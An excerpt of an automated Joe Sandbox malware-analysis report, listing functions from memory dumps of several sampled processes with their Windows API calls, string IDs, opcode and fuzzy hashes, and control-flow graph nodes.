                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0
                                                                                              • API String ID: 2622349952-4108050209
                                                                                              • Opcode ID: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
                                                                                              • Instruction ID: c3e82e79657528ee2b3b107e39cffe2f158cd9ffd8846af94a44b599f6a2352f
                                                                                              • Opcode Fuzzy Hash: f2329af900bc5e12ed2efd742944041ac38dd471b3cfad07a7a1e0fd7f142911
                                                                                              • Instruction Fuzzy Hash: 65F0AF701042C8AADF650F61DC8DBEE3B69AF04346F0C8124FC57506B1CB74CA90EB10
                                                                                              Function 00C70FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00C71206,?), ref: 00C70FEA
                                                                                              • GetLastError.KERNEL32(?), ref: 00C70FF6
                                                                                                • Part of subcall function 00C66C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C66C54
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00C70FFF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 75bd952e42b65238fe3e53843ceeff8d44d73bb2cbcb4774ecb746345e6de021
                                                                                              • Instruction ID: fdd0049a96ae75760453c26b609a012cb7ac1d561cf8a56ec66a6e661abfdbfe
                                                                                              • Opcode Fuzzy Hash: 75bd952e42b65238fe3e53843ceeff8d44d73bb2cbcb4774ecb746345e6de021
                                                                                              • Instruction Fuzzy Hash: 98D05E725089717ACA203338AC4EE6F3904AB22731F644715F639662F6CB254E92A692
                                                                                              Function 00C6E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00C6DA55,?), ref: 00C6E2A3
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00C6DA55,?), ref: 00C6E2B1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
                                                                                              • Instruction ID: fdbfb821d26cffbb0216146d07ec13939bb19d28724e1a8a5a42dbc5cac6e405
                                                                                              • Opcode Fuzzy Hash: db047c09df61b4148261d0293e4ffc96be7956488bec4013005781156866688d
                                                                                              • Instruction Fuzzy Hash: 8EC08C3124079066EB3027B47C4EF8B6F585B01B15F09149EBA81EA2E1DFE6CA80C7E0

                                                                                              Execution Graph

                                                                                              Execution Coverage:18.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 2692 7ffaac48831e 2693 7ffaac48832c GetConsoleWindow 2692->2693 2695 7ffaac4885c3 2693->2695

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC48831E Relevance: 1.8, APIs: 1, Instructions: 344COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 143 7ffaac48831e-7ffaac488379 147 7ffaac48837b 143->147 148 7ffaac48837c-7ffaac4883cc 143->148 147->148 150 7ffaac4883d3-7ffaac4883eb 148->150 151 7ffaac4883ce 148->151 152 7ffaac4883f9-7ffaac488443 150->152 153 7ffaac4883ed-7ffaac4883f6 150->153 151->150 157 7ffaac488445-7ffaac48844e 152->157 158 7ffaac488451-7ffaac488479 152->158 153->152 157->158 160 7ffaac488487-7ffaac4884fd 158->160 161 7ffaac48847b-7ffaac488484 158->161 164 7ffaac4884ff 160->164 165 7ffaac488500-7ffaac4885c1 GetConsoleWindow 160->165 161->160 164->165 170 7ffaac4885c3 165->170 171 7ffaac4885c9-7ffaac488619 165->171 170->171
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000019.00000002.2139433427.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_25_2_7ffaac480000_cnvwov.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2863861424-0
                                                                                              • Opcode ID: f86e20c7939f0d915d571a58c0dc0b148bccd8c9e1ba612babaf20542232f812
                                                                                              • Instruction ID: d3fcd2023d2505bfdcb81d8aed2376f25780306fab55c265763e97bab2564cce
                                                                                              • Opcode Fuzzy Hash: f86e20c7939f0d915d571a58c0dc0b148bccd8c9e1ba612babaf20542232f812
                                                                                              • Instruction Fuzzy Hash: 92B17D70908A5C8FDF99EF68C854AEDBBF1FF5A300F1441AAD00DD7292CA35A945CB40

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC461E4E Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 9c090af1199606cd88d230be15ed973df5ab76cd5dc608e4099412e95b3f0e40
                                                                                              • Instruction ID: 0ed999623bb86b943b9bac1f4b16d1d2cbf192f8c786b2c425a1b5541861938f
                                                                                              • Opcode Fuzzy Hash: 9c090af1199606cd88d230be15ed973df5ab76cd5dc608e4099412e95b3f0e40
                                                                                              • Instruction Fuzzy Hash: E551CF5160E7C50FE78697B8D8696657FE6DF8B220B0941FBE08DCB1A3CD488C0AC352
                                                                                              Function 00007FFAAC460650 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 1aa9f160e38d731f5961794a341839d92905bcc83115b88dd887c939f82f51ab
                                                                                              • Instruction ID: 2a2e2d2b48c60e31743c4e6f9e5efbddcb7bb247102b2adcc968da7fd7802a6c
                                                                                              • Opcode Fuzzy Hash: 1aa9f160e38d731f5961794a341839d92905bcc83115b88dd887c939f82f51ab
                                                                                              • Instruction Fuzzy Hash: E331E461B1C9480FE798EB3CD46A779B6C6EB99311F0405BEE04EC32A7DD249C468381
                                                                                              Function 00007FFAAC460D41 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6
                                                                                              • API String ID: 0-1452363761
                                                                                              • Opcode ID: 7925825c62383f5a474e17fcb6ec07195546c27ffa2b0a1da342c97e6f2f56f7
                                                                                              • Instruction ID: e04d2d7ef071101cec5365c3162c98f9ced09bc08fcb4c492ad9abe09a15691e
                                                                                              • Opcode Fuzzy Hash: 7925825c62383f5a474e17fcb6ec07195546c27ffa2b0a1da342c97e6f2f56f7
                                                                                              • Instruction Fuzzy Hash: 33310562B18A0A4FE784B7BCD80E7BDBBC5EF99311F044276E00DC3296DD289C418391
                                                                                              Function 00007FFAAC461739 Relevance: .5, Instructions: 532COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 388ae8f4b7c32e97d05c1bc4807268bbc67ed324ca74be7f7d331acd638c643a
                                                                                              • Instruction ID: 8a12bee760135531ffbbd5333fb5f56255c85055d707bc639d2cc1acbcc19660
                                                                                              • Opcode Fuzzy Hash: 388ae8f4b7c32e97d05c1bc4807268bbc67ed324ca74be7f7d331acd638c643a
                                                                                              • Instruction Fuzzy Hash: 6502D5A1B199498FFB88E738C459AB9B7E2EF99304F5044B8D00FC32D6DD28AC458785
                                                                                              Function 00007FFAAC460705 Relevance: .2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b39dcb597fe269b52859f508c0759b835e697ddeaaa9cfbfcf1cae70e3b46633
                                                                                              • Instruction ID: 7ac0248769a0868d7c45d8d7ddecb07088db6ef45d514f1c0bb622194f89b25e
                                                                                              • Opcode Fuzzy Hash: b39dcb597fe269b52859f508c0759b835e697ddeaaa9cfbfcf1cae70e3b46633
                                                                                              • Instruction Fuzzy Hash: 64814CB6A4D6854FF745DB68D8A95E8FFA1FF9230474880BAC04EC7397D8249845C7C8
                                                                                              Function 00007FFAAC460EAE Relevance: .2, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 403bfb2a7e14a4688e9b27a20bfd8cd220267c41becea8ff4fa38b7b4dc75f55
                                                                                              • Instruction ID: 471a1b7ee72dad884df3fb5477f864fd0f09c8d8b196526326a6cb153596a278
                                                                                              • Opcode Fuzzy Hash: 403bfb2a7e14a4688e9b27a20bfd8cd220267c41becea8ff4fa38b7b4dc75f55
                                                                                              • Instruction Fuzzy Hash: 48513962A0D6860FE356A73CD8696B57FD5DF87224B0940FBD08DC71A3DC5C9C468391
                                                                                              Function 00007FFAAC460BFB Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e1a101bfbdf1fa2e3f6f54a63a578a12540614a733d67b00c76be74030c3fcf
                                                                                              • Instruction ID: 000282c6501dcb0e81b9ec34d2d553677a2b8e2d939a6f1996c2bc7f8b7435cb
                                                                                              • Opcode Fuzzy Hash: 1e1a101bfbdf1fa2e3f6f54a63a578a12540614a733d67b00c76be74030c3fcf
                                                                                              • Instruction Fuzzy Hash: 4931E4B5A58A0A8FEB48EB78C459AEDBBE1FF89304F504479D00EC3386CD35A845C794
                                                                                              Function 00007FFAAC460870 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fef035e0bd40faa689532b12761768fc099f92c65f0e63973bda7bf15ee60c62
                                                                                              • Instruction ID: 5b2e530e3d6e941f89dbee773ef5e8812003ac8439e336240d290ee8e736fe87
                                                                                              • Opcode Fuzzy Hash: fef035e0bd40faa689532b12761768fc099f92c65f0e63973bda7bf15ee60c62
                                                                                              • Instruction Fuzzy Hash: 8431C1F568C6495FEB48EB28C4E8AA97FB1EFCA300B9084A5D40FC33DADD2468408741
                                                                                              Function 00007FFAAC461652 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4c5904dbae304fde065a53932c8d53568e2e46dedb2dca5008a06cb853f9ca1
                                                                                              • Instruction ID: dd0062bd5f89d90837c2d3be5b6330eb974f976dce3e759879a7a9a0a14d1608
                                                                                              • Opcode Fuzzy Hash: a4c5904dbae304fde065a53932c8d53568e2e46dedb2dca5008a06cb853f9ca1
                                                                                              • Instruction Fuzzy Hash: 19119069E1490E8FEB84E798E859AFCB7B1FF89310F408535D50EE3196CE2428494784
                                                                                              Function 00007FFAAC462001 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001D.00000002.2191106416.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_29_2_7ffaac460000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 06b2baed0af97710b4fc0b812810e1826ed98ba15b6945a69c406b6e40d01725
                                                                                              • Instruction ID: 5c945f0e820fcf449bb10be10c49e8433252fc340669655bbd637060c63c030b
                                                                                              • Opcode Fuzzy Hash: 06b2baed0af97710b4fc0b812810e1826ed98ba15b6945a69c406b6e40d01725
                                                                                              • Instruction Fuzzy Hash: F001455080E6824FF751A7385859432EFA0DF93345B0800A6E8CDC20ABD8049985C3C6

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC471E4E Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 8ff6b4702545b4e0f17335312ea58c72d96f9afaf4375c4671c14c22fc943b04
                                                                                              • Instruction ID: 18c33bbf7da36f60ff5050d29c550349054e047ac990077dc442dbbc1c941529
                                                                                              • Opcode Fuzzy Hash: 8ff6b4702545b4e0f17335312ea58c72d96f9afaf4375c4671c14c22fc943b04
                                                                                              • Instruction Fuzzy Hash: 3851C05160E7C50FE78697B898696657FE6DF8B220B0941FFE08DCB1A3DD588C0AC352
                                                                                              Function 00007FFAAC470650 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 810229091f28a9c119b6120898198858f507eada0f23176b7d21612a0e5c1f20
                                                                                              • Instruction ID: 320114cabc2746b264960be0f9f7323146a7d8c62e7bcba32b0a93f49cf8a1f8
                                                                                              • Opcode Fuzzy Hash: 810229091f28a9c119b6120898198858f507eada0f23176b7d21612a0e5c1f20
                                                                                              • Instruction Fuzzy Hash: 7931E961B1C9494FE798EB7CD46A779B6C6EF99311F0405BEE04EC32A3DD149C018381
                                                                                              Function 00007FFAAC470D41 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6
                                                                                              • API String ID: 0-1452363761
                                                                                              • Opcode ID: 065ef66c00d17908d604710884c1cc558ace04173b5fc80a86d75baf13ab2280
                                                                                              • Instruction ID: 9a5df3b4215b92e0360ff9e4cdac01205afb5c2b1529910eaa5e0df2a50b45e1
                                                                                              • Opcode Fuzzy Hash: 065ef66c00d17908d604710884c1cc558ace04173b5fc80a86d75baf13ab2280
                                                                                              • Instruction Fuzzy Hash: 40310562B19A1A4FE784B7BCD80E7BDBBC5EF99311F104176E00DC3292DD289C018391
                                                                                              Function 00007FFAAC471739 Relevance: .5, Instructions: 532COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c556d35d63d2bd169d19b56afe3f3f4edefc3e4561adf967b13f77071b1a04f
                                                                                              • Instruction ID: 55b7ea3e2f891d8858db5c0c8f3f5614109b27c5db74ecabc7d0177fa438ca4b
                                                                                              • Opcode Fuzzy Hash: 0c556d35d63d2bd169d19b56afe3f3f4edefc3e4561adf967b13f77071b1a04f
                                                                                              • Instruction Fuzzy Hash: 4C02E661B199598FEB88E778D46DAB97BE2EF99304F5044B8D00FC32D6DD28E80587C0
                                                                                              Function 00007FFAAC470705 Relevance: .2, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a8ef7879af44270b82b79dded07372d059cf9c0b08197c6643fd269ce72bc68
                                                                                              • Instruction ID: 5f351c3aeb54054da3743ddd9f5f39cd98f5e7b9614e5639b9c725b58be91c75
                                                                                              • Opcode Fuzzy Hash: 5a8ef7879af44270b82b79dded07372d059cf9c0b08197c6643fd269ce72bc68
                                                                                              • Instruction Fuzzy Hash: 1E815D62A4E6D54FF359EB78E8694F87FA1EF5120474880BAD08AC7397DC28D809C7C4
                                                                                              Function 00007FFAAC470EAE Relevance: .2, Instructions: 204COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b28b2133eafc15b7b679cdfb0f26f263619a9d6c1d4cde42c1e727fe2476f56c
                                                                                              • Instruction ID: 4404e6f205c95a0727a49add24c6115d7d878b70acfc164c7fa2737c37c14a7e
                                                                                              • Opcode Fuzzy Hash: b28b2133eafc15b7b679cdfb0f26f263619a9d6c1d4cde42c1e727fe2476f56c
                                                                                              • Instruction Fuzzy Hash: BB515A62A0E6960FE356A73CD8296B53FE5DF87220B0940FBD08DC71A3DC18AC468391
                                                                                              Function 00007FFAAC470BFB Relevance: .1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02c4c470eddabf989018549c5f786ca8d24e63cfa95a3059e8e0f2125cbff03b
                                                                                              • Instruction ID: 4ee0795cfa9413f2e0fd4dcfc2489ab5f8334da87c7b46316a54e019a6798af2
                                                                                              • Opcode Fuzzy Hash: 02c4c470eddabf989018549c5f786ca8d24e63cfa95a3059e8e0f2125cbff03b
                                                                                              • Instruction Fuzzy Hash: 2131B571A58A1A8FEB48EB78D459AFDBFA1FF98300F504579D00AD3382DD34A845C790
                                                                                              Function 00007FFAAC470870 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 549d59dd7487487506f7c0c01cb22d5069d088de81358446a29db16adf6f4f9f
                                                                                              • Instruction ID: 2f0d5431a65c0dc5359aeb825f8514eca8e71061b169eddbb9e87315b8b73342
                                                                                              • Opcode Fuzzy Hash: 549d59dd7487487506f7c0c01cb22d5069d088de81358446a29db16adf6f4f9f
                                                                                              • Instruction Fuzzy Hash: 8131E86068C6495FE358E72AF4A8DB97F71FF88200BD184A5D40BC3396DD24A800C781
                                                                                              Function 00007FFAAC471652 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e9f3a56fdabd9fb13207fbb853186ad518577292170e5c9dd6b222bca8f9f301
                                                                                              • Instruction ID: 545eed458b3e2581cc03f638c917127777e9b6ca220d61936593b744b9550a6d
                                                                                              • Opcode Fuzzy Hash: e9f3a56fdabd9fb13207fbb853186ad518577292170e5c9dd6b222bca8f9f301
                                                                                              • Instruction Fuzzy Hash: 2911B172E1491A8BFB44EB98E85A5FDBBB1FF49210F908235D50FE3196DE24280987C4
                                                                                              Function 00007FFAAC472001 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.2213613867.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffaac470000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bf49569d2eefcfe361cceb9118fe2e3ce56999ab8fc8c06c6fa7c37292f0352
                                                                                              • Instruction ID: e05d4ab32d2a1f960495c124597f107141863d0284fa3a10b8565aae4b7e8bcc
                                                                                              • Opcode Fuzzy Hash: 3bf49569d2eefcfe361cceb9118fe2e3ce56999ab8fc8c06c6fa7c37292f0352
                                                                                              • Instruction Fuzzy Hash: D301644080E7D18FF3A5A738986D4366FF0DF92354B0844BBE88DC24A3DC089989C3E6

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC480D48 Relevance: 6.5, Strings: 5, Instructions: 255COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000021.00000002.2693846548.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_33_2_7ffaac480000_portBrowserweb.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "9$5Y_H$b4$r6$r6
                                                                                              • API String ID: 0-1368079978
                                                                                              • Opcode ID: cc509deea72ebf1c7d32d09c49e24800123561a92e2b470664f4840d58ee1e12
                                                                                              • Instruction ID: 8203b3ec94c72e07ec8620e223dd4a864a722acd313e2c7705249a0f9f89e3e2
                                                                                              • Opcode Fuzzy Hash: cc509deea72ebf1c7d32d09c49e24800123561a92e2b470664f4840d58ee1e12
